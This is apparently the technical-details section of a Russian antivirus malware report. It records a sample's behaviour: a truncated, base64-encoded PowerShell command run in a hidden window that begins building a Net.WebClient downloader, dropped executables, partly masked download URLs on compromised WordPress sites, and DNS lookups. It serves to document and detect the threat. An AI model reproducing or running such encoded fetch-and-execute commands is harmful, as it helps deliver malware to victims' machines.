Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABjAEEAWgBjAEEAQgB4AEEAPQAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAEQAdwB4AEQAQQAnACwAJwBJACcAKQA7ACQAegBHAFEAQQBCAFUAPQBOAGAAZQBXAGAALQBvAEIAagBlAGMAVAAgACgAJwBOAGUAdAAuAFcAJwArACcAZQBiACcAKwAnAE...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1540
- %TEMP%\803592.cvr
- %HOMEPATH%\456.exe
- %HOMEPATH%\456.exe
- 'be##.##livreur09.com':80
- 'ar####utomaten.com':80
- 'ar###shop.be':443
- 'ka####coffee.com':80
- 'bi###feitaly.ru':80
- http://be##.##livreur09.com/wp-content/ewm/
- http://ar####utomaten.com/wp-content/y92/
- http://ka####coffee.com/large/ljUft8/
- http://bi###feitaly.ru/wp-admin/84iG/
- 'ar####utomaten.com':443
- DNS ASK be##.##livreur09.com
- DNS ASK ar####utomaten.com
- DNS ASK ar###shop.be
- DNS ASK ba#.##rizonvape.pro
- DNS ASK ka####coffee.com
- DNS ASK bi###feitaly.ru
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABjAEEAWgBjAEEAQgB4AEEAPQAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAEQAdwB4AEQAQQAnACwAJwBJACcAKQA7ACQAegBHAFEAQQBCAFUAPQBOAGAAZQBXAGAALQBvAEIAagBlAGMAVAAgACgAJwBOAGUAdAAuAFcAJwArACcAZQBiACcAKwAnAE...' (со скрытым окном)